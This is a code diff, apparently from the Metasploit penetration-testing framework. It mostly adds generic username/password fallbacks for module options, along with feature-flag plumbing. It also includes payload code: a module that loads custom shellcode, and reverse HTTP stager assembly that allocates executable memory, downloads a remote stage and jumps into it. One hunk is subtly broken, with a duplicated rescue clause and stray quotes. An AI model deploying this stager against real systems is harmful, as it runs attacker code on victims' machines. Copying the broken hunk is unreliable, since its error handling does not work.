+  # These defaults will be used if the user has not explicitly defined a specific datastore value.
+  # These will be checked as a priority to any options that also provide defaults.
+  #
+  # @return [Hash{String => Msf::OptBase}] The hash of default values
+  attr_accessor :defaults
+
+  # @return [Hash{String => String}] The key is the old option name, the value is the new option name
+  attr_accessor :aliases
+
+  #
+  # Copy the state from the other Msf::DataStore. The state will be coped in a shallow fashion, other than
+  # imported and user_defined strings.
+  #
+  # @param [Msf::DataStore] other The other datastore to copy state from
+  # @return [Msf::DataStore] the current datastore instance
+  def copy_state(other)
+    self.options = other.options.dup
+    self.aliases = other.aliases.dup
+    self.defaults = other.defaults.transform_values { |value| value.kind_of?(String) ? value.dup : value }
+    self.user_defined = other.user_defined.transform_values { |value| value.kind_of?(String) ? value.dup : value }
+
+    self
+  end
+
+  # Raised when the specified key is not found
+  # @param [string] key
+  def key_error_for(key)
+    ::KeyError.new "key not found: #{key.inspect}"
+  end
+
+  #
+  # Simple dataclass for storing the result of a datastore search
+  #
+  class DataStoreSearchResult
+    # @return [String, nil] the key associated with the fallback value
+    attr_reader :fallback_key
+
+    # @return [object, nil] The value if found
+    attr_reader :value
+
+    def initialize(result, value, namespace: nil, fallback_key: nil)
+      @namespace = namespace
+      @result = result
+      @value = value
+      @fallback_key = fallback_key
+    end
+
+    def default?
+      result == :imported_default || result == :option_default || !found?
+    end
+
+    def found?
+      result != :not_found
+    end
+
+    def fallback?
+      result == :option_fallback
+    end
+
+    def global?
+      namespace == :global_data_store && found?
+    end
+
+  protected
+
+    # @return [Symbol] namespace Where the search result was found, i.e. a module datastore or global datastore
+    attr_reader :namespace
+
+    # @return [Symbol] result is one of `user_defined`, `not_found`, `option_fallback`, `option_default`, `imported_default`
+    attr_reader :result
+  end
+
+  def search_result(result, value, fallback_key: nil)
+    DataStoreSearchResult.new(result, value, namespace: :global_data_store, fallback_key: fallback_key)
+  end
+end
+
+end
@@ -69,7 +69,9 @@ module Exploit::Powershell
  # @return [String] Encoded script
  def encode_script(script_in, eof = nil)
    opts = {}
-    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ && v }.keys.map do |k|
+    datastore.keys.select { |k| k =~ /^Powershell::(strip|sub)/i }.each do |k|
+      next unless datastore[k]
+
      mod_method = k.split('::').last.intern
      opts[mod_method.to_sym] = true
    end
@@ -101,7 +103,9 @@ module Exploit::Powershell
  # @return [String] Compressed script with decompression stub
  def compress_script(script_in, eof = nil)
    opts = {}
-    datastore.select { |k, v| k =~ /^Powershell::(strip|sub)/ && v }.keys.map do |k|
+    datastore.keys.select { |k| k =~ /^Powershell::(strip|sub)/i }.each do |k|
+      next unless datastore[k]
+
      mod_method = k.split('::').last.intern
      opts[mod_method.to_sym] = true
    end
@@ -23,8 +23,8 @@ module Exploit::Remote::Ftp
      [
        Opt::RHOST,
        Opt::RPORT(21),
-        OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'anonymous']),
-        OptString.new('FTPPASS', [ false, 'The password for the specified username', 'mozilla@example.com'])
+        OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'anonymous'], fallbacks: ['USERNAME']),
+        OptString.new('FTPPASS', [ false, 'The password for the specified username', 'mozilla@example.com'], fallbacks: ['PASSWORD']),
      ], Msf::Exploit::Remote::Ftp)

    register_advanced_options(
@@ -25,7 +25,7 @@ module Msf
            res = send_request_cgi(
              'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
              'method' => 'GET',
-              'keep_cookies' => 'true'
+              'keep_cookies' => true
            )
            return nil if res.nil? || res.code != 200

@@ -59,7 +59,7 @@ module Msf
                'pw' => password
              },
              'method' => 'POST',
-              'keep_cookies' => 'true'
+              'keep_cookies' => true
            )
            if res && res.code == 200 && res.body.exclude?('Sign in to start your session')
              return res.get_cookies
@@ -76,7 +76,7 @@ module Msf
            vprint_status('Forcing gravity pull')
            send_request_cgi(
              'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'),
-              'keep_cookies' => 'true'
+              'keep_cookies' => true
            )
          end

@@ -90,7 +90,7 @@ module Msf
              'vars_get' => {
                'tab' => tab
              },
-              'keep_cookies' => 'true'
+              'keep_cookies' => true
            )
            return nil unless res or res.code == 200
            # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">
@@ -15,8 +15,8 @@ module Msf
        Opt::RHOST,
        Opt::RPORT(389),
        OptBool.new('SSL', [false, 'Enable SSL on the LDAP connection', false]),
-        OptString.new('BIND_DN', [false, 'The username to authenticate to LDAP server']),
-        OptString.new('BIND_PW', [false, 'Password for the BIND_DN'])
+        OptString.new('BIND_DN', [false, 'The username to authenticate to LDAP server'], fallbacks: ['USERNAME']),
+        OptString.new('BIND_PW', [false, 'Password for the BIND_DN'], fallbacks: ['PASSWORD'])
      ])

      register_advanced_options([
@@ -45,9 +45,9 @@ module Msf
        register_advanced_options(
        [
          OptBool.new('SMBDirect', [ false, 'The target port is a raw SMB service (not NetBIOS)', true ]),
-          OptString.new('SMBUser', [ false, 'The username to authenticate as', '']),
-          OptString.new('SMBPass', [ false, 'The password for the specified username', '']),
-          OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.']),
+          OptString.new('SMBUser', [ false, 'The username to authenticate as', ''], fallbacks: ['USERNAME']),
+          OptString.new('SMBPass', [ false, 'The password for the specified username', ''], fallbacks: ['PASSWORD']),
+          OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.'], fallbacks: ['DOMAIN']),
          OptString.new('SMBName', [ true, 'The NetBIOS hostname (required for port 139 connections)', '*SMBSERVER']),
          OptBool.new('SMB::VerifySignature', [ true, "Enforces client-side verification of server response signatures", false]),
          OptInt.new('SMB::ChunkSize', [ true, 'The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing', 500]),
@@ -12,9 +12,9 @@ module Exploit::Remote::SMB::Client::Authenticated
    super
    register_options(
      [
-        OptString.new('SMBUser', [ false, 'The username to authenticate as', '']),
-        OptString.new('SMBPass', [ false, 'The password for the specified username', '']),
-        OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.']),
+        OptString.new('SMBUser', [ false, 'The username to authenticate as', ''], fallbacks: ['USERNAME']),
+        OptString.new('SMBPass', [ false, 'The password for the specified username', ''], fallbacks: ['PASSWORD']),
+        OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.'], fallbacks: ['DOMAIN']),
      ], Msf::Exploit::Remote::SMB::Client::Authenticated)
  end
 end
@@ -87,7 +87,7 @@ class ExploitDriver
      raise IncompatiblePayloadError.new(payload.refname),
        "#{payload.refname} is not a compatible payload.", caller
    end
-    
+
    unless exploit.respond_to?(:allow_no_cleanup) && exploit.allow_no_cleanup
      # Being able to cleanup requires a session to be created from a handler, and for that
      # session to be able to be able to clean up files
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 # frozen_string_literal: true

+require 'rex/text'

 module Msf
  ###
@@ -14,6 +15,7 @@ module Msf

    CONFIG_KEY = 'framework/features'
    WRAPPED_TABLES = 'wrapped_tables'
+    DATASTORE_FALLBACKS = 'datastore_fallbacks'
    FULLY_INTERACTIVE_SHELLS = 'fully_interactive_shells'
    SERVICEMANAGER_COMMAND = 'servicemanager_command'
    DEFAULTS = [
@@ -31,6 +33,12 @@ module Msf
        name: SERVICEMANAGER_COMMAND,
        description: 'When enabled you will have access to the _servicemanager command',
        default_value: false
+      }.freeze,
+      {
+        name: DATASTORE_FALLBACKS,
+        description: 'When enabled you can consistently set username across modules, instead of setting SMBUser/FTPUser/BIND_DN/etc',
+        requires_restart: true,
+        default_value: false
      }.freeze
    ].freeze

@@ -58,6 +66,8 @@ module Msf
      end
    end

+    # @param [String] name The feature name
+    # @return [TrueClass,FalseClass] True if the flag is be enabled, false otherwise
    def enabled?(name)
      return false unless @flag_lookup[name]

@@ -65,6 +75,14 @@ module Msf
      feature.key?(:user_preference) ? feature[:user_preference] : feature[:default_value]
    end

+    # @param [String] name The feature name
+    # @return [TrueClass,FalseClass] True if the flag requires a console restart to work effectively
+    def requires_restart?(name)
+      return false unless @flag_lookup[name]
+
+      @flag_lookup[name][:requires_restart] == true
+    end
+
    def exists?(name)
      @flag_lookup.key?(name)
    end
@@ -62,6 +62,9 @@ class Framework
    # Allow specific module types to be loaded
    types = options[:module_types] || Msf::MODULE_TYPES

+    self.features = FeatureManager.instance
+    self.features.load_config
+
    self.events    = EventDispatcher.new(self)
    self.modules   = ModuleManager.new(self,types)
    self.datastore = DataStore.new
@@ -69,7 +72,6 @@ class Framework
    self.analyze   = Analyze.new(self)
    self.plugins   = PluginManager.new(self)
    self.browser_profiles = Hash.new
-    self.features = FeatureManager.instance

    # Configure the thread factory
    Rex::ThreadFactory.provider = Metasploit::Framework::ThreadFactoryProvider.new(framework: self)
@@ -207,9 +207,9 @@ module Msf
            OptString.new('PIPENAME', [true, 'Name of the pipe to connect to', 'msf-pipe']),
            OptString.new('RHOST', [false, 'Host of the pipe to connect to', '']),
            OptPort.new('LPORT', [true, 'SMB port', 445]),
-            OptString.new('SMBUser', [false, 'The username to authenticate as', '']),
-            OptString.new('SMBPass', [false, 'The password for the specified username', '']),
-            OptString.new('SMBDomain', [false, 'The Windows domain to use for authentication', '.']),
+            OptString.new('SMBUser', [false, 'The username to authenticate as', ''], fallbacks: ['USERNAME']),
+            OptString.new('SMBPass', [false, 'The password for the specified username', ''], fallbacks: ['PASSWORD']),
+            OptString.new('SMBDomain', [false, 'The Windows domain to use for authentication', '.'], fallbacks: ['DOMAIN']),
          ], Msf::Handler::BindNamedPipe)
        register_advanced_options(
          [
@@ -388,14 +388,21 @@ protected
          begin
            blob = self.generate_stage(url: url, uuid: uuid, uri: conn_id)
            blob = encode_stage(blob) if self.respond_to?(:encode_stage)
+            # remove this when we make http payloads prepend stage sizes by default
+            if defined?(read_stage_size?) && read_stage_size?
+              print_status("Appending Stage Size For HTTP[S]...")
+              blob = [ blob.length ].pack('V') + blob
+            end

            print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...")

            resp['Content-Type'] = 'application/octet-stream'
            resp.body = blob

-          rescue NoMethodError
-            print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.")
+          rescue NoMethodError => e
+          rescue NoMethodError => e
+            print_error('Staging failed. This can occur when stageless listeners are used with staged payloads.''')
+            elog('Staging failed. This can occur when stageless listeners are used with staged payloads.', error: e)
            return
          end
        end
@@ -6,7 +6,7 @@ module Msf::Module::DataStore
  # @attribute [r] datastore
  #   The module-specific datastore instance.
  #
-  #   @return [Hash{String => String}]
+  #   @return [Msf::DataStore]
  attr_reader   :datastore

  #
@@ -21,7 +21,11 @@ module Msf::Module::DataStore

    # If there are default options, import their values into the datastore
    if (module_info['DefaultOptions'])
-      self.datastore.import_options_from_hash(module_info['DefaultOptions'], true, 'self')
+      if datastore.is_a?(Msf::DataStoreWithFallbacks)
+        self.datastore.import_defaults_from_hash(module_info['DefaultOptions'], imported_by: 'import_defaults')
+      else
+        self.datastore.import_options_from_hash(module_info['DefaultOptions'], true, 'self')
+      end
    end

    # Preference the defaults for the currently set target
@@ -34,7 +38,11 @@ module Msf::Module::DataStore
  def import_target_defaults
    return unless defined?(targets) && targets && target && target.default_options

-    datastore.import_options_from_hash(target.default_options, true, 'self')
+    if self.datastore.is_a?(Msf::ModuleDataStoreWithFallbacks)
+      datastore.import_defaults_from_hash(target.default_options, imported_by: 'import_target_defaults')
+    else
+      datastore.import_options_from_hash(target.default_options, true, 'self')
+    end
  end

  #
@@ -30,7 +30,11 @@ module Msf::Module::Options
  def deregister_options(*names)
    names.each { |name|
      real_name = self.datastore.find_key_case(name)
-      self.datastore.delete(name)
+      if self.datastore.is_a?(Msf::DataStoreWithFallbacks)
+        self.datastore.remove_option(name)
+      else
+        self.datastore.delete(name)
+      end
      self.options.remove_option(name)
      if real_name != name
        self.options.remove_option(real_name)
@@ -10,6 +10,20 @@ module Msf
  ###
  class ModuleDataStore < DataStore

+    # Temporary forking logic for conditionally using the {Msf::ModuleDatastoreWithFallbacks} implementation.
+    #
+    # This method replaces the default `ModuleDataStore.new` with the ability to instantiate the `ModuleDataStoreWithFallbacks`
+    # class instead, if the feature is enabled
+    def self.new(m)
+      if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+        return Msf::ModuleDataStoreWithFallbacks.new(m)
+      end
+
+      instance = allocate
+      instance.send(:initialize, m)
+      instance
+    end
+
    def initialize(m)
      super()

@@ -0,0 +1,80 @@
+# -*- coding: binary -*-
+module Msf
+
+  ###
+  #
+  # DataStore wrapper for modules that will attempt to back values against the
+  # framework's datastore if they aren't found in the module's datastore.  This
+  # is done to simulate global data store values.
+  #
+  ###
+  class ModuleDataStoreWithFallbacks < DataStoreWithFallbacks
+
+    # @param [Msf::Module] m
+    def initialize(m)
+      super()
+
+      @_module = m
+    end
+
+    #
+    # Return a copy of this datastore. Only string values will be duplicated, other values
+    # will share the same reference
+    # @return [Msf::DataStore] a new datastore instance
+    def copy
+      new_instance = self.class.new(@_module)
+      new_instance.copy_state(self)
+      new_instance
+    end
+
+    # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
+    # If a value is not present in the current datastore, the global parent store will be referenced instead
+    #
+    # @param [String] key The key to search for
+    # @return [DataStoreSearchResult]
+    def search_for(key)
+      k = find_key_case(key)
+      return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
+
+      # Preference globally set values over a module's option default
+      framework_datastore_search = search_framework_datastore(key)
+      return framework_datastore_search if framework_datastore_search.found? && !framework_datastore_search.default?
+
+      option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
+      if option
+        # If the key isn't present - check any additional fallbacks that have been registered with the option.
+        # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
+        # generic 'Username' fallback
+        option.fallbacks.each do |fallback|
+          fallback_search = search_for(fallback)
+          if fallback_search.found?
+            return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
+          end
+        end
+      end
+
+      # Checking for imported default values, ignoring case again TODO: add Alias test for this
+      imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
+      return search_result(:imported_default, imported_default_match.last) if imported_default_match
+      return search_result(:option_default, option.default) if option
+
+      search_framework_datastore(k)
+    end
+
+    protected
+
+    # Search the framework datastore
+    #
+    # @param [String] key The key to search for
+    # @return [DataStoreSearchResult]
+    def search_framework_datastore(key)
+      return search_result(:not_found, nil) if @_module&.framework.nil?
+
+      @_module.framework.datastore.search_for(key)
+    end
+
+    def search_result(result, value, fallback_key: nil)
+      DataStoreSearchResult.new(result, value, namespace: :module_data_store, fallback_key: fallback_key)
+    end
+  end
+end
@@ -25,13 +25,15 @@ module Msf
    # also be a string as standin for the required description field.
    #
    def initialize(in_name, attrs = [],
-                   required: false, desc: nil, default: nil, conditions: [], enums: [], regex: nil, aliases: [], max_length: nil)
+                   required: false, desc: nil, default: nil, conditions: [], enums: [], regex: nil, aliases: [], max_length: nil,
+                   fallbacks: [])
      self.name     = in_name
      self.advanced = false
      self.evasion  = false
      self.aliases  = aliases
      self.max_length = max_length
      self.conditions = conditions
+      self.fallbacks = fallbacks

      if attrs.is_a?(String) || attrs.length == 0
        self.required = required
@@ -201,10 +203,28 @@ module Msf
    # A optional regex to validate the option value
    #
    attr_accessor :regex
+
    #
-    # Aliases for this option for backward compatibility
+    # Array of aliases for this option for backward compatibility.
    #
+    # This is useful in the scenario of an existing option being renamed
+    # to a new value. Either the current option name or list of aliases can
+    # be used in modules for retrieving datastore values, or by a user when
+    # setting datastore values manually.
+    #
+    # @return [Array<String>] the array of aliases
    attr_accessor :aliases
+
+    #
+    # Array of fallbacks for this option.
+    #
+    # This is useful in the scenario of wanting specialised option names such as
+    # {SMBUser}, but to also support gracefully checking a list of more generic fallbacks
+    # option names such as {Username}.
+    #
+    # @return [Array<String>] the array of fallbacks
+    attr_accessor :fallbacks
+
    #
    # The max length of the input value
    #
@@ -110,6 +110,7 @@ module Msf
    #
    # Removes an option.
    #
+    # @param [String] name the option name
    def remove_option(name)
      delete(name)
      sorted.each_with_index { |e, idx|
@@ -0,0 +1,30 @@
+# -*- coding => binary -*-
+
+#
+module Msf::Payload::Custom
+
+  def stage_payload(_opts = {})
+    return nil if datastore['SHELLCODE_FILE'].blank?
+
+    File.binread(datastore['SHELLCODE_FILE'])
+  end
+
+  def setup_handler
+    if datastore['SHELLCODE_FILE'].blank?
+      fail_with(Msf::Module::Failure::BadConfig, "No SHELLCODE_FILE provided")
+    end
+    begin
+      # read the file before we start the handler to make sure that it is valid
+      test = File.binread(datastore['SHELLCODE_FILE'])
+    rescue => e
+      print_error("Unable to read #{datastore['SHELLCODE_FILE']}:")
+      elog("Unable to read #{datastore['SHELLCODE_FILE']}:", error: e)
+      fail_with(Msf::Module::Failure::BadConfig, "Bad SHELLCODE_FILE provided")
+    end
+    super
+  end
+
+  def read_stage_size?
+    true
+  end
+end
@@ -0,0 +1,15 @@
+# -*- coding => binary -*-
+
+#
+# This module provides datastore option definitions and helper methods for payload modules that support UUIDs
+#
+module Msf::Payload::Custom::Options
+
+  def initialize(info = {})
+    super
+    register_options(
+      [
+        Msf::OptPath.new('SHELLCODE_FILE', [false, 'Shellcode bin to launch', nil])
+      ], self.class)
+  end
+end
@@ -32,12 +32,13 @@ module Msf::Payload::Single
      # If they defined a custom method that will return the payload, then
      # call it
      if self.class.method_defined?(:generate_stage)
-        generate_stage
-      # Otherwise, just use the default method to generate the single
-      # payload
-      else
-        super
+        # this can safely be ignored for adapters
+        unless self.class.include?(Msf::Payload::Adapter)
+          wlog("Single payload '#{self.fullname}' has #generate_stage defined when it should be using #generate")
+        end
      end
+
+      super
    end
  end

@@ -170,6 +170,7 @@ module Msf::Payload::Stager
  # @param (see handle_connection_stage)
  # @return (see handle_connection_stage)
  def handle_connection(conn, opts={})
+
    # If the stage should be sent over the client connection that is
    # established (which is the default), then go ahead and transmit it.
    if (stage_over_connection?)
@@ -447,7 +447,49 @@ module Payload::Windows::ReverseHttp
      ^
    end

-    asm << %Q^
+    if defined?(read_stage_size?) && read_stage_size?
+      asm << %Q^
+    allocate_memory:
+    read_stage_size:
+      push ebx               ; temporary storage for stage size
+      mov eax, esp           ; pointer to 4b buffer for stage size
+      push ebx               ; temporary storage for bytesRead
+      mov edi, esp           ; pointer to 4b buffer for bytesRead
+      push edi               ; &bytesRead
+      push 4                 ; bytes to read
+      push eax               ; &stage size
+      push esi               ; hRequest
+      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+      call ebp               ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
+      pop ebx                ; bytesRead (unused, pop for cleaning)
+      pop ebx                ; stage size
+      test eax,eax           ; download failed? (optional?)
+      jz failure
+      xor eax, eax
+      push 0x40              ; PAGE_EXECUTE_READWRITE
+      push 0x1000            ; MEM_COMMIT
+      push ebx               ; Stage allocation
+      push eax               ; NULL as we dont care where the allocation is
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+    download_prep:
+      xchg eax, ebx          ; place the allocated base address in ebx
+      push ebx               ; store a copy of the stage base address on the stack (for ret later)
+      push ebx               ; temporary storage for bytes read count
+      mov edi, esp           ; &bytesRead
+    download_more:
+      push edi               ; &bytesRead
+      push eax               ; read length
+      push ebx               ; buffer
+      push esi               ; hRequest
+      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
+      call ebp
+      test eax,eax           ; download failed? (optional?)
+      jz failure
+      pop eax                ; clear the temporary storage for bytesread
+    ^
+    else
+      asm << %Q^
    allocate_memory:
      push 0x40              ; PAGE_EXECUTE_READWRITE
      push 0x1000            ; MEM_COMMIT
@@ -479,7 +521,9 @@ module Payload::Windows::ReverseHttp
      test eax,eax           ; optional?
      jnz download_more      ; continue until it returns 0
      pop eax                ; clear the temporary storage
-
+      ^
+      end
+    asm << %Q^
    execute_stage:
      ret                    ; dive into the stored stage address

--- a/Show More
+++ b/Show More